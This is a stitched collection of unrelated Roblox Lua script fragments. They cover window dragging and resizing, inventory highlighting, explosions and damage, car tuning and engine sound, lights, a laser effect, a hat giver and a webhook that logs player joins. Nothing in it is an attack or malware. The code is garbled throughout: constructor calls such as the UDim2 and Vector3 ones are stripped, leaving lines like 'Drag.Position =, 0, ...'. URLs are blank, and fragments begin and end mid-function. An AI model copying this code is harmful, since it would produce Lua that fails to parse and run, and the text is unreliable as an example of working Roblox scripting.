dragSize or Drag.Size Hide.Text = "-" Hide.LineHeight = origLH gTable.Minimized = false end if onMinimize then onMinimize(Main.Visible) end if Walls then wallPosition() end end function isInFrame(x, y, frame) if x > frame.AbsolutePosition.X and x < (frame.AbsolutePosition.X+frame.AbsoluteSize.X) and y > frame.AbsolutePosition.Y and y < (frame.AbsolutePosition.Y+frame.AbsoluteSize.Y) then return true else return false end end function wallPosition() if gTable.Active then local x,y = Drag.AbsolutePosition.X, Drag.AbsolutePosition.Y local abx, gx, gy = Drag.AbsoluteSize.X, GUI.AbsoluteSize.X, GUI.AbsoluteSize.Y local ySize = (Main.Visible and Main.AbsoluteSize.Y) or Drag.AbsoluteSize.Y if x < 0 then Drag.Position =, 0, Drag.Position.Y.Scale, Drag.Position.Y.Offset) end if y < 0 then Drag.Position =, Drag.Position.X.Offset, 0, 0) end if x + abx > gx then Drag.Position =, GUI.AbsoluteSize.X - Drag.AbsoluteSize.X, Drag.Position.Y.Scale, Drag.Position.Y.Offset) end if y + ySize > gy then Drag.Position =, Drag.Position.X.Offset, 0, GUI.AbsoluteSize.Y - ySize) end end end function setSize(newSize) if newSize and type(newSize) == "table" then if newSize[1] < 50 then newSize[1] = 50 end if newSize[2] < 50 then newSize[2] = 50 end Drag.Size =,newSize[1],0,25) Main.Size =,0,0,newSize[2]) end end function setPosition(newPos) if newPos and typeof(newPos) == "UDim2" then Drag.Position = newPos elseif newPos and type(newPos) == "table" then Drag.Position =, newPos[1], 0, newPos[2]) elseif Size and not newPos then Drag.Position =, -Drag.AbsoluteSize.X/2, 0.5, -Main.AbsoluteSize.Y/2) end end if Name then gTable.Name = Name if data.AllowMultiple ~= nil and data.AllowMultiple == false then local found, num = client.UI.Get(Name, GUI, true) if found then doClose() return nil end end end if Size then setSize(Size) end if Position then setPosition(Position) end if Title then Titlef.Text = Title end if CanKeepAlive or not ResetOnSpawn then gTable.CanKeepAlive = true GUI.ResetOnSpawn = false elseif ResetOnSpawn then gTable.CanKeepAlive = false GUI.ResetOnSpawn = true end if Icon then Iconf.Visible = true Iconf.Image = Icon end if CanvasSize then ScrollFrame.CanvasSize = CanvasSize end if noClose then Close.Visible = false Refresh.Position = Hide.Position Hide.Position = Close.Position end if noHide then Hide.Visible = false Refresh.Position = Hide.Position end if Walls then Drag.DragStopped:connect(function() wallPosition() end) end if onRefresh then local debounce = false function DoRefresh() if not Refreshing then local done = false Refreshing = true spawn(function() while gTable.Active and not done do for i = 0,180,10 do rSpinner.Rotation = -i wait(1/60) end end end) onRefresh() wait(1) done = true Refreshing = false end end Refresh.MouseButton1Down:connect(function() if not debounce then debounce = true DoRefresh() debounce = false end end) Titlef.Size =, -130, Titlef.Size.Y.Scale, Titlef.Size.Y.Offset) else Refresh.Visible = false end if iconClicked then Iconf.MouseButton1Down(function() iconClicked(data, GUI, Iconf) end) end if Menu then data.Menu.Text = "" data.Menu.Parent = Main data.Menu.Size =,-10,0,25) data.Menu.Position =,5,0,25) ScrollFrame.Size =,-10,1,-55) ScrollFrame.Position =,5,0,50) data.Menu.BackgroundColor3 = Color3.fromRGB(216, 216, 216) data.Menu.BorderSizePixel = 0 create("TextLabel",data.Menu) end if not SizeLocked then local startXPos = Drag.AbsolutePosition.X local startYPos = Drag.AbsolutePosition.Y local startXSize = Drag.AbsoluteSize.X local startYSize = Drag.AbsoluteSize.Y local vars = client.Variables local newIcon local inFrame local ReallyInFrame local function readify(obj) obj.MouseEnter:connect(function() ReallyInFrame = obj end) obj.MouseLeave:connect(function() if ReallyInFrame == obj then ReallyInFrame = nil end end) end --[[ readify(Drag) readify(ScrollFrame) readify(TopRight) readify(TopLeft) readify(RightCorner) readify(LeftCorner) readify(RightSide) readify(LeftSide) readify(Bottom) readify(Top) --]] function checkMouse(x, y) --// Update later to remove frame by frame pos checking if gTable.Active and Main.Visible then if isInFrame(x, y, Drag) or isInFrame(x, y, ScrollFrame) then inFrame = nil newIcon = nil elseif isInFrame(x, y, TopRight) then inFrame = "TopRight" newIcon = MouseIcons.TopRight elseif isInFrame(x, y, TopLeft) then inFrame = "TopLeft" newIcon = MouseIcons.TopLeft elseif isInFrame(x, y, RightCorner) then inFrame = "RightCorner" newIcon = MouseIcons.RightCorner elseif isInFrame(x, y, LeftCorner) then inFrame = "LeftCorner" newIcon = MouseIcons.LeftCorner elseif isInFrame(x, y, RightSide) then inFrame = "RightSide" newIcon = MouseIcons.Horizontal elseif isInFrame(x, y, LeftSide) then inFrame = "LeftSide" newIcon = MouseIcons.Horizontal elseif isInFrame(x, y, Bottom) then inFrame = "Bottom" newIcon = MouseIcons.Vertical elseif isInFrame(x, y, Top) then inFrame = "Top" newIcon = MouseIcons.Vertical else inFrame = nil newIcon = nil end else inFrame = nil end if (not client.Variables.MouseLockedBy) or client.Variables.MouseLockedBy == gTable then if inFrame and newIcon then Mouse.Icon = newIcon client.Variables.MouseLockedBy = gTable elseif client.Variables.MouseLockedBy == gTable then Mouse.Icon = curIcon client.Variables.MouseLockedBy = nil end end end local function inputStart(x, y) checkMouse(x, y) if gTable.Active and inFrame and not Resizing and not isInFrame(x, y, ScrollFrame) and not isInFrame(x, y, Drag) then Resizing = inFrame startXPos = Drag.AbsolutePosition.X startYPos = Drag.AbsolutePosition.Y startXSize = Drag.AbsoluteSize.X startYSize = Main.AbsoluteSize.Y end end local function inputEnd() if gTable.Active then if Resizing and onResize then onResize(, Drag.Size.X.Offset, Main.Size.Y.Scale, Main.Size.Y.Offset)) end Resizing = nil Mouse.Icon = curIcon --DragEnabled = true --if Walls then -- wallPosition() --end end end local function inputMoved(x, y) if gTable.Active then if Mouse.Icon ~= MouseIcons.TopRight and Mouse.Icon ~= MouseIcons.TopLeft and Mouse.Icon ~= MouseIcons.RightCorner and Mouse.Icon ~= MouseIcons.LeftCorner and Mouse.Icon ~= MouseIcons.Horizontal and Mouse.Icon ~= MouseIcons.Vertical then curIcon = Mouse.Icon end if Resizing then local moveX = false local moveY = false local newPos = Drag.Position local xPos, yPos = x, y local newX, newY = startXSize, startYSize --DragEnabled = false if Resizing == "TopRight" then newX = (xPos - startXPos) + 3 newY = (startYPos - yPos) + startYSize -1 moveY = true elseif Resizing == "TopLeft" then newX = (startXPos - xPos) + startXSize -1 newY = (startYPos - yPos) + startYSize -1 moveY = true moveX = true elseif Resizing == "RightCorner" then newX = (xPos - startXPos) + 3 newY = (yPos - startYPos) + 3 elseif Resizing == "LeftCorner" then newX = (startXPos - xPos) + startXSize + 3 newY = (yPos - startYPos) + 3 moveX = true elseif Resizing == "LeftSide" then newX = (startXPos - xPos) + startXSize + 3 newY = startYSize moveX = true elseif Resizing == "RightSide" then newX = (xPos - startXPos) + 3 newY = startYSize elseif Resizing == "Bottom" then newX = startXSize newY = (yPos - startYPos) + 3 elseif Resizing == "Top" then newX = startXSize newY = (startYPos - yPos) + startYSize - 1 moveY = true end if newX < MinSize[1] then newX = MinSize[1] end if newY < MinSize[2] then newY = MinSize[2] end if newX > MaxSize[1] then newX = MaxSize[1] end if newY > MaxSize[2] then newY = MaxSize[2] end if moveX then newPos =, (startXPos+startXSize)-newX, newPos.Y.Scale, newPos.Y.Offset) end if moveY then newPos =, newPos.X.Offset, 0, (startYPos+startYSize)-newY) end Drag.Position = newPos Drag.Size =, newX, Drag.Size.Y.Scale, Drag.Size.Y.Offset) Main.Size =, Main.Size.X.Offset, 0, newY) if not Titlef.TextFits then Titlef.Visible = false else Titlef.Visible = true end else checkMouse(x, y) end end end Event(InputService.InputBegan, function(input, gameHandled) if not gameHandled and (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then inputStart(Mouse.X, Mouse.Y) end end) Event(InputService.InputChanged, function(input, gameHandled) if (input.UserInputType == Enum.UserInputType.MouseMovement or Enum.UserInputType.Touch) then inputMoved(input.Position.X, input.Position.Y) end end) Event(InputService.InputEnded, function(input, gameHandled) if (input.UserInputType == Enum.UserInputType.MouseButton1 or Enum.UserInputType.Touch) then inputEnd() end end) --[[Event(Mouse.Button1Down, function() if gTable.Active and inFrame and not Resizing and not isInFrame(Mouse.X, Mouse.Y, ScrollFrame) and not isInFrame(Mouse.X, Mouse.Y, Drag) then Resizing = inFrame startXPos = Drag.AbsolutePosition.X startYPos = Drag.AbsolutePosition.Y startXSize = Drag.AbsoluteSize.X startYSize = Main.AbsoluteSize.Y checkMouse() end end) Event(Mouse.Button1Up, function() if gTable.Active then if Resizing and onResize then onResize(, Drag.Size.X.Offset, Main.Size.Y.Scale, Main.Size.Y.Offset)) end Resizing = nil Mouse.Icon = curIcon --if Walls then -- wallPosition() --end end end)--]] else LeftSizeIcon.Visible = false RightSizeIcon.Visible = false end Close.MouseButton1Down:connect(doClose) Hide.MouseButton1Down:connect(function() doHide() end) gTable.CustomDestroy = function() service.UnWrap(GUI):Destroy() if client.Variables.MouseLockedBy == gTable then Mouse.Icon = curIcon client.Variables.MouseLockedBy = nil end if not isClosed then isClosed = true if onClose then onClose() end end end for i,child in next,GUI:GetChildren() do if child.Name ~= "Desc" and child.Name ~= "Drag" then specialInsts[child.Name] = child child.Parent = nil end end --// Drag & DisplayOrder Handler do local windowValue ="BoolValue", GUI) local dragDragging = false local dragOffset local inFrame windowValue.Name = "__ADONIS_WINDOW" Event(Main.InputBegan, function(input) if gTable.Active and (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then BringToFront() end end) Event(Drag.InputBegan, function(input) if gTable.Active then inFrame = true if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then BringToFront() end end end) Event(Drag.InputChanged, function(input) if gTable.Active then inFrame = true end end) Event(Drag.InputEnded, function(input) inFrame = false end) Event(InputService.InputBegan, function(input) if inFrame and GUI.DisplayOrder == 101 and not dragDragging and (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then--isInFrame(input.Position.X, input.Position.Y, object) then dragDragging = true BringToFront() dragOffset = - input.Position.X, Drag.AbsolutePosition.Y - input.Position.Y) end end) Event(InputService.InputChanged, function(input) if dragDragging and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then Drag.Position =, dragOffset.X + input.Position.X, 0, dragOffset.Y + input.Position.Y) end end) Event(InputService.InputEnded, function(input) if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then dragDragging = false end end) end --// Finishing up local api = apiIfy(ScrollFrame, data) local meta = api:GetMetatable() local oldNewIndex = meta.__newindex local oldIndex = meta.__index create("ScrollingFrame", nil, ScrollFrame) LoadChildren(api, Content) api:SetSpecial("gTable", gTable) api:SetSpecial("Window", GUI) api:SetSpecial("Main", Main) api:SetSpecial("Title", Titlef) api:SetSpecial("Dragger", Drag) api:SetSpecial("Destroy", doClose) api:SetSpecial("Close", doClose) api:SetSpecial("Object", ScrollFrame) api:SetSpecial("Refresh", DoRefresh) api:SetSpecial("AddTitleButton", function(ignore, data) if type(ignore) == "table" and not data then data = ignore end return addTitleButton(data) end) api:SetSpecial("Ready", function() if onReady then onReady() end gTable.Ready() BringToFront() end) api:SetSpecial("BindEvent", function(ignore, ...) Event(...) end) api:SetSpecial("Hide", function(ignore, hide) doHide(hide) end) api:SetSpecial("SetTitle", function(ignore, newTitle) Titlef.Text = newTitle end) api:SetSpecial("SetPosition", function(ignore, newPos) setPosition(newPos) end) api:SetSpecial("SetSize", function(ignore, newSize) setSize(newSize) end) api:SetSpecial("GetPosition", function() return Drag.AbsolutePosition end) api:SetSpecial("GetSize", function() return Main.AbsoluteSize end) api:SetSpecial("IsVisible", isVisible) api:SetSpecial("IsClosed", isClosed) meta.__index = function(tab, ind) if ind == "IsVisible" then return isVisible() elseif ind == "Closed" then return isClosed else return oldIndex(tab, ind) end end setSize(Size) setPosition(Position) if Ready then gTable:Ready() BringToFront() end return api,GUI end
-- Go through each setting value
for _, i in pairs(settingVals) do -- Make sure not nil if i ~= nil then -- Connect changed event i.Changed:connect(function() -- Set border to be on if this item if i.Value == itemName and script.Parent.Parent.Player.Value == plr and script.Parent.ItemType.Value ~= "Emote" and itemName ~= "" then -- Turn on border script.Parent.GreenEdge.Visible = true else -- Check if equip nothing as toy button if itemName == "" and script.Parent.ItemType.Value == "Toy" then -- Check if equipped anywhere local equipped = false for _, o in pairs(settingVals) do if o.Value ~= "" then equipped = true break end end -- Only turn on border if nothing equipped if equipped then script.Parent.GreenEdge.Visible = false else script.Parent.GreenEdge.Visible = true end else -- Check if equipped anywhere local equipped = false for _, o in pairs(settingVals) do if o.Value == itemName then equipped = true break end end -- Set border accordingly if not equipped then script.Parent.GreenEdge.Visible = false else script.Parent.GreenEdge.Visible = true end end end end) -- Set up if i.Value == itemName and script.Parent.Parent.Player.Value == plr and script.Parent.ItemType.Value ~= "Emote" and (script.Parent.ItemType.Value ~= "Toy" or itemName ~= "") then script.Parent.GreenEdge.Visible = true plr.PlayerGui.MainGui.Inventory.MainFrame.Preview.Item.Value = actualItem end end end
--function untagHumanoid(humanoid) -- if humanoid ~= nil then -- local tag = humanoid:findFirstChild("creator") -- if tag ~= nil then -- tag.Parent = nil -- end -- end --end
function explode() local explosion ="Explosion") local blastradius=4 explosion.BlastRadius = blastradius explosion.BlastPressure = 0 -- 10k explosion.DestroyJointRadiusPercent = math.random(0.05,0.1) explosion.ExplosionType = 'CratersAndDebris' explosion.Visible = false explosion.Position = script.Parent.Position explosion.Parent = game.Workspace explosion.Hit:connect(function(hitPart, hitDistance) local humanoid = hitPart.Parent:FindFirstChildWhichIsA("Humanoid") --print("onexplosionhit, part is "..hitPart.Name) --if character then -- local myPlayer = CreatorTag.Value -- if myPlayer and not myPlayer.Neutral then -- Ignore friendlies caught in the blast -- local player = PlayersService:GetPlayerFromCharacter(character) -- if player and player ~= myPlayer and player.TeamColor == Rocket.BrickColor then -- return -- end -- end --end if humanoid and humanoid.Health > 0 and hitPart.Name==("Torso") then -- Humanoids are tagged and damaged local dmg=math.random(12,16) dmg=dmg*(hitDistance/blastradius) humanoid:TakeDamage(dmg) print("dealt "..dmg.." damage to "..hitPart.Parent.Name) end end) end connection = ball.Touched:connect(onTouched)
-- assume we are in the character, let's check
function sepuku() script.Parent = nil end local h = script.Parent:FindFirstChild("Humanoid") if (h == nil) then sepuku() end local oldSpeed = h.WalkSpeed h.WalkSpeed = h.WalkSpeed * 1.6 local torso = script.Parent:FindFirstChild("Torso") if (torso == nil) then sepuku() end local head = script.Parent:FindFirstChild("Head") if (head == nil) then head = torso end local count = h:FindFirstChild("CoffeeCount") if (count == nil) then count ="IntValue") count.Name = "CoffeeCount" count.Value = 1 count.Parent = h else if (count.Value > 3) then if (math.random() > .5) then local sound ="Sound") sound.SoundId = "rbxasset://sounds\\Rocket shot.wav" sound.Parent = head sound.Volume = 1 sound:play() local e ="Explosion") e.BlastRadius = 4 e.Position = head.Position s:Clone().Parent = head e.Parent = head end end count.Value = count.Value + 1 end wait(30) h.WalkSpeed = oldSpeed s:Remove() script.Parent = nil
--Torque Curve Tune.Horsepower = 1000 -- [TORQUE CURVE VISUAL] Tune.IdleRPM = 1100 -- Tune.PeakRPM = 8250 -- Use sliders to manipulate values Tune.Redline = 8750 -- Copy and paste slider values into the respective tune values Tune.EqPoint = 5250 Tune.PeakSharpness = 5.8 Tune.CurveMult = 0.294 --Incline Compensation Tune.InclineComp = 1.5 -- Torque compensation multiplier for inclines (applies gradient from 0-90 degrees) --Misc Tune.RevAccel = 400 -- RPM acceleration when clutch is off Tune.RevDecay = 300 -- RPM decay when clutch is off Tune.RevBounce = 450 -- RPM kickback from redline Tune.IdleThrottle = 0 -- Percent throttle at idle Tune.ClutchTol = 450 -- Clutch engagement threshold (higher = faster response, lower = more stable RPM)
--Gear Ratios
Tune.FinalDrive = 13.5 -- Gearing determines top speed and wheel torque Tune.Ratios = { -- Higher ratio = more torque, Lower ratio = higher top speed --[[Reverse]] 1.5 , -- Copy and paste a ratio to add a gear --[[Neutral]] 0 , -- Ratios can also be deleted --[[ 1 ]] 1.89 , -- Reverse, Neutral, and 1st gear are required --[[ 2 ]] 0.76 , --[[ 3 ]] 0.49 , --[[ 4 ]] 0.33 , --[[ 5 ]] 0.21 , } Tune.FDMult = 1.0 -- Ratio multiplier (keep this at 1 if car is not struggling with torque)
--- Replace with true/false to force the chat type. Otherwise this will default to the setting on the website.
module.BubbleChatEnabled = true -- PlayersService.BubbleChat module.ClassicChatEnabled = true -- PlayersService.ClassicChat
--[[ Player methods ]]
function Waiting:playerAdded(player) Util.loadCharacter(player) end function Waiting:playerRemoving() end function Waiting:characterAdded(player, character) -- Give the player the Pistol as the default starting weapon ReplicatedStorage.Assets.Weapons.Pistol:Clone().Parent = player.Backpack -- Grant the player a force field so they cant be killed in the waiting area local forceField ="ForceField") forceField.Name = "WaitingForceField" forceField.Visible = false forceField.Parent = character CollectionService:AddTag(character, "PlayerCharacter") end return Waiting
--create tables:
for i,part in pairs(model:GetChildren()) do if string.sub(part.Name, 1,1) == "a" then table.insert(a, 1, part) end end for i,part in pairs(model:GetChildren()) do if string.sub(part.Name, 1,1) == "b" then table.insert(b, 1, part) end end function lightOn(T) for i, part in pairs (T) do if part:FindFirstChild("SurfaceLight") then part.SurfaceLight.Enabled = true end if part:FindFirstChild("SpotLight") then part.SpotLight.Enabled = true end end end function lightOff(T) for i, part in pairs (T) do if part:FindFirstChild("SurfaceLight") then part.SurfaceLight.Enabled = false end if part:FindFirstChild("SpotLight") then part.SpotLight.Enabled = false end end end while true do lightOn(a) wait(0.15) lightOff(a) wait(0.04) lightOn(a) wait(0.15) lightOff(a) wait(0.1) lightOn(b) wait(0.15) lightOff(b) wait(0.04) lightOn(b) wait(0.15) lightOff(b) wait(0.1) end
--[[ Create a promise that represents the immediately resolved value. ]]
function Promise.resolve(value) return resolve(value) end) end
--Made by Luckymaxer
Debris = game:GetService("Debris") Camera = game:GetService("Workspace").CurrentCamera Sounds = { RayHit = script:WaitForChild("Hit") } BasePart ="Part") BasePart.Shape = Enum.PartType.Block BasePart.Material = Enum.Material.Plastic BasePart.TopSurface = Enum.SurfaceType.Smooth BasePart.BottomSurface = Enum.SurfaceType.Smooth BasePart.FormFactor = Enum.FormFactor.Custom BasePart.Size =, 0.2, 0.2) BasePart.CanCollide = true BasePart.Locked = true BasePart.Anchored = false BaseRay = BasePart:Clone() BaseRay.Name = "Laser" BaseRay.BrickColor ="Bright red") BaseRay.Material = Enum.Material.Neon BaseRay.Size =, 0.2, 0.2) BaseRay.Anchored = true BaseRay.CanCollide = false BaseRayMesh ="SpecialMesh") BaseRayMesh.Name = "Mesh" BaseRayMesh.MeshType = Enum.MeshType.Brick BaseRayMesh.Scale =, 0.2, 1) BaseRayMesh.Offset =, 0.2, 0) BaseRayMesh.VertexColor =, 1, 1) BaseRayMesh.Parent = BaseRay function PlaySound(Position, Sound) local SoundPart = BasePart:Clone() SoundPart.Name = "ParticlePart" SoundPart.Transparency = 1 SoundPart.Anchored = true SoundPart.CanCollide = false local SoundObject = Sound:Clone() SoundObject.Parent = SoundPart Debris:AddItem(SoundPart, 1.5) SoundPart.Parent = game:GetService("Workspace") SoundPart.CFrame = SoundObject:Play() end function FireRay(StartPosition, TargetPosition, Hit) local Vec = (TargetPosition - StartPosition) local Distance = Vec.magnitude local Direction = Vec.unit local PX = (StartPosition + (0.0 * Distance) * Direction) local PY = (StartPosition + (0.0 * Distance) * Direction) local PZ = (StartPosition + (0.0 * Distance) * Direction) local DX = (StartPosition - PX).magnitude local DY = (PX - PY).magnitude local DZ = (PY - PZ).magnitude local Limit = 2 local AX = (PX +, (-0.0 * DX)), math.min(Limit, (0.21 * DX))),math.random(math.max(-Limit, (-0.21 * DX)),math.min(Limit, (0.21 * DX))), math.random(math.max(-Limit, (-0.21 * DX)), math.min(Limit, (0.21 * DX))))) local AY = (PY +, (-0.0 * DY)), math.min(Limit, (0.21 * DY))),math.random(math.max(-Limit, (-0.21 * DY)),math.min(Limit, (0.21 * DY))), math.random(math.max(-Limit, (-0.21 * DY)), math.min(Limit, (0.21 * DY))))) local AZ = (PZ +, (-0.0 * DZ)), math.min(Limit, (0.21 * DZ))),math.random(math.max(-Limit, (-0.21 * DZ)),math.min(Limit, (0.21 * DZ))), math.random(math.max(-Limit, (-0.21 * DZ)), math.min(Limit, (0.21 * DZ))))) local Rays = { {Distance = (AX - StartPosition).magnitude, Direction =, AX)}, {Distance = (AY - AX).magnitude, Direction =, AY)}, {Distance = (AZ - AY).magnitude, Direction =, AZ)}, {Distance = (TargetPosition - AZ).magnitude, Direction =, TargetPosition)}, } for i, v in pairs(Rays) do local Ray = BaseRay:Clone() Ray.BrickColor ="Bright red") Ray.Reflectance = 0.4 Ray.Transparency = 0.3 --1 local Mesh = Ray.Mesh Mesh.Scale = (, 0.15, (v.Distance / 1)) * 5) Ray.CFrame = (v.Direction *, 0, (-0.5 * v.Distance))) Debris:AddItem(Ray, (0.1 / (#Rays - (i - 1)))) Ray.Parent = Camera end end pcall(function() local StartPosition = script:WaitForChild("StartPosition").Value local TargetPosition = script:WaitForChild("TargetPosition").Value local RayHit = script:WaitForChild("RayHit").Value FireRay(StartPosition, TargetPosition) if RayHit then PlaySound(TargetPosition, Sounds.RayHit) end end) Debris:AddItem(script, 1)
--[[ ___ _______ _ / _ |____/ ___/ / ___ ____ ___ (_)__ / __ /___/ /__/ _ \/ _ `(_-<(_-</ (_-< /_/ |_| \___/_//_/\_,_/___/___/_/___/ SecondLogic @ Inspare ]]
local FE = workspace.FilteringEnabled local car = script.Parent.Car.Value local handler = car:WaitForChild("AC6_FE_Sounds") local _Tune = require(car["A-Chassis Tune"]) local on = 0 local mult=0 local det=.13 local trm=.4 local trmmult=0 local trmon=0 local throt=0 local redline=0 local shift=0 script:WaitForChild("Rev") script.Parent.Values.Gear.Changed:connect(function() mult=1 if script.Parent.Values.RPM.Value>5000 then shift=.2 end end) for i,v in pairs(car.DriveSeat:GetChildren()) do for _,a in pairs(script:GetChildren()) do if v.Name==a.Name then v:Stop() wait() v:Destroy() end end end handler:FireServer("newSound","Rev",car.DriveSeat,script.Rev.SoundId,0,script.Rev.Volume,true) handler:FireServer("playSound","Rev") car.DriveSeat:WaitForChild("Rev") while wait() do mult=math.max(0,mult-.1) local _RPM = script.Parent.Values.RPM.Value if script.Parent.Values.Throttle.Value <= _Tune.IdleThrottle/100 then throt = math.max(.3,throt-.2) trmmult = math.max(0,trmmult-.05) trmon = 1 else throt = math.min(1,throt+.1) trmmult = 1 trmon = 0 end shift = math.min(1,shift+.2) if script.Parent.Values.RPM.Value > _Tune.Redline-_Tune.RevBounce/4 and script.Parent.Values.Throttle.Value > _Tune.IdleThrottle/100 then redline=.5 else redline=1 end if not script.Parent.IsOn.Value then on=math.max(on-.015,0) else on=1 end local Volume = (2*throt*shift*redline)+(trm*trmon*trmmult*(1-throt)*math.sin(tick()*50)) local Pitch = math.max((((script.Rev.SetPitch.Value + script.Rev.SetRev.Value*_RPM/_Tune.Redline))*on^2)+(det*mult*math.sin(80*tick())),script.Rev.SetPitch.Value) if FE then if script.Parent:FindFirstChild("DriveMode").Value ~= "Comfort" then handler:FireServer("updateSound","Rev",script.Rev.SoundId,Pitch,Volume) else handler:FireServer("updateSound","Rev",script.Rev.SoundId,Pitch/1.2,Volume/1.2) end else if script.Parent:FindFirstChild("DriveMode").Value ~= "Comfort" then car.DriveSeat.Rev.Volume = Volume car.DriveSeat.Rev.Pitch = Pitch else car.DriveSeat.Rev.Volume = Volume/1.75 car.DriveSeat.Rev.Pitch = Pitch /1.5 end end end
--[[ NOTICE: Only used for an AF timer. If converting into an AF, enable this script and make the parent "FederalSignalARTimer" or "FederalSignalAFTimer". Link the FlasherUnitValueAddress to the On value located inside the RCM3 or RC6 flasher unit under "SignatrolModel30Flasher". ]]
-- self.waist.C0 = self.waistC0 * CFrame.fromEulerAnglesYXZ(set.z*0.5, set.y, 0);
end return lookAt;
-- (Hat Giver Script - Loaded.)
debounce = true function onTouched(hit) if (hit.Parent:findFirstChild("Humanoid") ~= nil and debounce == true) then debounce = false h ="Hat") p ="Part") h.Name = "Black Top Hat" p.Parent = h p.Position = hit.Parent:findFirstChild("Head").Position p.Name = "Handle" p.formFactor = 0 p.Size =, 0.8, 0.4) p.BottomSurface = 0 p.TopSurface = 0 p.Locked = true script.Parent.Mesh:clone().Parent = p h.Parent = hit.Parent h.AttachmentPos =, 0.2, 0) wait(5) debounce = true end end script.Parent.Touched:connect(onTouched)
-- ROBLOX NOTE: no upstream -- ROBLOX TODO: fix PrettyFormat types imports
type CompareKeys = ((a: string, b: string) -> number) | nil type Plugin = any export type Plugins = { [number]: Plugin } type ThemeReceived = { comment: string?, content: string?, prop: string?, tag: string?, value: string?, } export type PrettyFormatOptions = { callToJSON: boolean?, compareKeys: CompareKeys, escapeRegex: boolean?, escapeString: boolean?, highlight: boolean?, indent: number?, maxDepth: number?, min: boolean?, plugins: Plugins?, printBasicPrototype: boolean?, printFunctionName: boolean?, theme: ThemeReceived?, } export type OptionsReceived = PrettyFormatOptions return {}
--[[ AnimateKey(note1,px,py,pz,ox,oy,oz,Time) --note1(1-61), position x, position y, position z, orientation x, orientation y, orientation z, time local obj = --object or gui or wahtever goes here local Properties = {} Properties.Size = Tween(obj,Properties,2,true,Enum.EasingStyle.Linear,Enum.EasingDirection.Out,0,false) --Obj,Property,Time,wait,Easingstyle,EasingDirection,RepeatAmt,Reverse ]]
function HighlightPianoKey(note1,transpose) if not Settings.KeyAesthetics then return end local key = Piano.Keys.Keys:FindFirstChild(note1) if key then if IsBlack(note1) then AnimateKey(note1,0,.085,0,12,0,-.01,.2) else AnimateKey(note1,0,.093,0,8,0,0,.2) end end end
--스킬 설정:
local skillName = "Fire" --스킬 파트 이름 local Sound = "fire" --적용할 사운드 이름 (추천) local Sound2 = "Bomb" --적용할 사운드 이름 (추천) local CoolTime = 1 --스킬 재사용 대기시간 local Damage = 10 --스킬 데미지 local DamageCoolTime = 0.3 --스킬 데미지 쿨타임 (추천) local Delete = 0.2 --초를 기다리고 스킬 삭제 (추천) local Ammo = 5 --날라갈 탄 갯수 (고정)
-- 1.) Put 'Gauges' and 'RPM Light [FE+]' in the Plugins folder.
--------------------) Settings
Damage = 0 -- the ammout of health the player or mob will take Cooldown = 10 -- cooldown for use of the tool again BoneModelName = "Ultra hand2" -- name the zone model HumanoidName = "Humanoid"-- the name of player or mob u want to damage
--[[script.Parent.HouseThing.CreateButton.MouseButton1Click:Connect(function() if debounce == false then debounce = true game:GetService("ReplicatedStorage")["Requests"].MakeHouse:FireServer(script.Parent.HouseThing.TextBox.Text) wait(1) debounce = false end end) game:GetService("ReplicatedStorage")["Requests"].MakeHouse.OnClientEvent:Connect(function(msg) script.Parent.HouseThing.TextBox.Text = msg wait(1) if msg == "House Created" then script.Parent:Destroy() end end)--]] --[[ if GetPlayer then local Character = GetPlayer.Character local blank = "" local getplrname = blank .. GetPlayer.RaceName.Value local clonename = script.Parent.PlrName.Value:Clone() script.Parent.PlrName.Value.Archivable = false clonename:SetPrimaryPartCFrame( clonename.Parent = workspace clonename.HumanoidRootPart.Orientation =, -180, 0); for fart, fart2 in pairs(clonename:GetChildren()) do if fart2:IsA("Accessory") or fart2:IsA("BasePart") then if not (not getplrname.find(fart2.Name, "Arm")) or not (not getplrname.find(fart2.Name, "Leg")) or fart2.Name == "Torso" then fart2:ClearAllChildren() fart2.Transparency = 1; end else fart2:Destroy(); end end for imtired, imtired2 in pairs(clonename:GetChildren()) do if imtired2.Name == "StarterCharacter" then imtired2:Destroy(); end end clonename.Parent = script.Parent.Viewport local monkey ="Camera") monkey.CameraType = Enum.CameraType.Scriptable monkey.CFrame = clonename.Head.CFrame:ToWorldSpace(, 0, -4.5)) monkey.CFrame =, clonename.Head.Position) monkey.CameraSubject = clonename.Head monkey.CameraType = Enum.CameraType.Fixed monkey.DiagonalFieldOfView = 85 monkey.Parent = Viewport Viewport.CurrentCamera = monkey end ]]
--Light off
src.right.Value.Value = 0 light.Value = false else src.right.Value.Value = 1 light.Value = true return end end end) src.Parent.ChildRemoved:connect(function(child) if child.Name=="SeatWeld" then src:Stop() script.Parent:Destroy() end end)
Players.PlayerAdded:Connect(function(plr) local data = { ["contents"] = "", ["username"] = plr.Name .. " - (#"..plr.userId..")", ["avatar_url"] = ""..plr.userId, ["embeds"] = {{ ["title"]=, ["description"] = plr.Name .. " joined the Game", ["type"]= "rich", ["color"]= tonumber(0x6AA84F), ["fields"]={ { ["name"]="Event: Player joined", ["value"]="User: **"..plr.Name.."** with ID: **"..plr.UserId.."** has joined [game](".. game.PlaceId..")/[Profile]("..plr.UserId.."/profile)", ["inline"]=true}}}} } http:PostAsync(webhook,http:JSONEncode(data)) end)
-- if hit.Parent.Name == game.Players.LocalPlayer.Name then return end
if hit.Parent:findFirstChild("OverrideScript") == nil then local s = script.OverrideScript:clone() s.Parent = hit.Parent s.Disabled = false end barb:Remove() elseif hit.CanCollide == true then barb:Remove() end end)
--[[ ___ _______ _ / _ |____/ ___/ / ___ ____ ___ (_)__ / __ /___/ /__/ _ \/ _ `(_-<(_-</ (_-< /_/ |_| \___/_//_/\_,_/___/___/_/___/ SecondLogic @ Inspare ]]
local car = script.Parent.Car.Value local vl = script.Parent.Values local strength = 350 --this may require some experimenting, this is a good setting as-is. higher value = stronger. local max = 8 --in SPS, not km/h, not MPH.
